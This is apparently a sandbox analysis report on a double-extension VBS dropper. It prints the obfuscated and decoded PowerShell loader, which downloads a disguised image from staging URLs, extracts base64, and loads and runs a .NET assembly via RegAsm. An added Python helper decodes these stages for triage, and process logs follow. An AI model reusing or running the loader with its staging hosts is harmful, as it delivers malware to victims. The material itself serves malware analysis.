Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@
EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@H Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.mApAgbe/moc.swanozama.1-tsae-su.3s.52akel//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec Jump to behavior
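The two command lines above are the whole loader chain: wscript.exe hands powershell.exe a `$dosigo` string that is base64 of UTF-16LE script text with every `A` replaced by `@` (so it is not valid base64 until the substitution is undone), and the decoded stage 2 fetches a "jpg" from one of two staging URLs in random order, cuts the text between `<<BASE64_START>>` and `<<BASE64_END>>`, loads the result as a .NET assembly with `Assembly.Load`, and invokes a method whose first argument is a string written backwards. The following is an added triage helper, not code from the report or from Joe Sandbox. The 72-character `STAGE1_SAMPLE` is copied from the report's `$dosigo` value (the page truncates the rest); the staging-file sample and the placeholder "assembly" bytes are constructed for the example; the `looks_like_at_obfuscated_b64` heuristic is an assumption derived from this one sample, not a vendor signature.

```python
import base64
from typing import Optional

# Constructed sample: the first 72 characters of the $dosigo value shown in the
# report's wscript.exe -> powershell.exe command line. The full value is much
# longer and is truncated on the page, so only this prefix is embedded here.
STAGE1_SAMPLE = (
    "WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@"
)

# Markers and the reversed first argument, copied from the decoded stage-2
# command line in the report.
START_FLAG = "<<BASE64_START>>"
END_FLAG = "<<BASE64_END>>"
REVERSED_ARG = "txt.mApAgbe/moc.swanozama.1-tsae-su.3s.52akel//:s"

B64_ALPHABET = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
)


def deobfuscate_stage1(blob: str) -> str:
    """Recover the stage-2 PowerShell text from a $dosigo-style blob.

    The blob is base64 of UTF-16LE script text in which every 'A' was
    replaced by '@'. Incomplete trailing base64 groups and a dangling half
    UTF-16 code unit (both occur when the page truncates the string) are
    discarded rather than raising.
    """
    b64 = blob.replace("@", "A")
    b64 = b64[: len(b64) - len(b64) % 4]  # keep only complete 4-char groups
    raw = base64.b64decode(b64)
    if len(raw) % 2:
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


def extract_embedded_assembly(staging_text: str) -> Optional[bytes]:
    """Mirror the loader's marker search on a captured staging file.

    Returns the base64-decoded bytes between <<BASE64_START>> and
    <<BASE64_END>>, or None when the markers are missing or out of order,
    which is the same condition under which the loader does nothing.
    """
    start = staging_text.find(START_FLAG)
    end = staging_text.find(END_FLAG)
    if start < 0 or end <= start:
        return None
    start += len(START_FLAG)
    return base64.b64decode(staging_text[start:end])


def unreverse(arg: str) -> str:
    """The loader passes its first argument backwards; reverse it to read it."""
    return arg[::-1]


def looks_like_at_obfuscated_b64(s: str, min_len: int = 32) -> bool:
    """Heuristic (assumption) for this loader's obfuscation style.

    Base64 of UTF-16LE ASCII text contains 'A' constantly because every other
    byte is 0x00, so a long run of base64 characters plus '@' with no 'A' at
    all but plenty of '@' is a strong signal. Other substitutions are not
    covered by this check.
    """
    if len(s) < min_len or "A" in s:
        return False
    if any(ch not in B64_ALPHABET and ch != "@" for ch in s):
        return False
    return s.count("@") >= len(s) // 10


# Constructed staging file: junk around a marker-delimited base64 blob.
# The "assembly" is a placeholder, not a real PE or .NET image.
FAKE_ASSEMBLY = b"MZ\x90\x00 placeholder-not-a-real-assembly"
STAGING_SAMPLE = (
    "\xff\xd8 fake jpeg header "
    + START_FLAG
    + base64.b64encode(FAKE_ASSEMBLY).decode()
    + END_FLAG
    + " trailing bytes"
)


if __name__ == "__main__":
    print(deobfuscate_stage1(STAGE1_SAMPLE))
    print(extract_embedded_assembly(STAGING_SAMPLE)[:4])
    print(unreverse(REVERSED_ARG))
    print(looks_like_at_obfuscated_b64(STAGE1_SAMPLE))
```

Running the block prints `[Net.ServicePointManager]::` for the sample prefix, `b'MZ\x90\x00'` for the constructed staging file, and `s://leka25.s3.us-east-1.amazonaws.com/ebgApAm.txt` for the reversed argument, which reads as a URL with its scheme prefix cut off; what the loaded assembly does with that string, and with the `StartupName` and `RegAsm` arguments, is not shown on this page and is not assumed here. On a real capture, feed the full `$dosigo` value from the process tree to `deobfuscate_stage1` and the downloaded "test2.jpg"/"test.jpg" body to `extract_embedded_assembly`, then hand the returned bytes to a .NET decompiler.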
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00416823 push cs; ret 6_2_00416829
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041D4D2 push eax; ret 6_2_0041D4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041D4DB push eax; ret 6_2_0041D542
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041D485 push eax; ret 6_2_0041D4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041D53C push eax; ret 6_2_0041D542
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C09AD push ecx; mov dword ptr [esp], ecx 6_2_030C09B6
Source: C:\Windows\explorer.exe Code function: 7_2_0BC0BB02 push esp; retn 0000h 7_2_0BC0BB03
Source: C:\Windows\explorer.exe Code function: 7_2_0BC0BB1E push esp; retn 0000h 7_2_0BC0BB1F
Source: C:\Windows\explorer.exe Code function: 7_2_0BC0B9B5 push esp; retn 0000h 7_2_0BC0BAE7
Source: C:\Windows\explorer.exe Code function: 7_2_0F263B02 push esp; retn 0000h 7_2_0F263B03
Source: C:\Windows\explorer.exe Code function: 7_2_0F263B1E push esp; retn 0000h 7_2_0F263B1F
Source: C:\Windows\explorer.exe Code function: 7_2_0F2639B5 push esp; retn 0000h 7_2_0F263AE7
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E6B1E push esp; retn 0000h 7_2_0F3E6B1F
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E6B02 push esp; retn 0000h 7_2_0F3E6B03
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E69B5 push esp; retn 0000h 7_2_0F3E6AE7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E39C4D push ecx; ret 8_2_00E39C60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034D09AD push ecx; mov dword ptr [esp], ecx 8_2_034D09B6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B16823 push cs; ret 8_2_00B16829
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1D485 push eax; ret 8_2_00B1D4D8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1D4D2 push eax; ret 8_2_00B1D4D8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1D4DB push eax; ret 8_2_00B1D542
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1D53C push eax; ret 8_2_00B1D542
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0324EB02 push esp; retn 0000h 8_2_0324EB03
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0324EB1E push esp; retn 0000h 8_2_0324EB1F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0324E9B5 push esp; retn 0000h 8_2_0324EAE7

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior (4 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior (3 identical entries)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x88 0x8E 0xEC
Source: Possible double extension: xls.vbs Static PE information: RFQ Order PT502818.xls.vbs
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
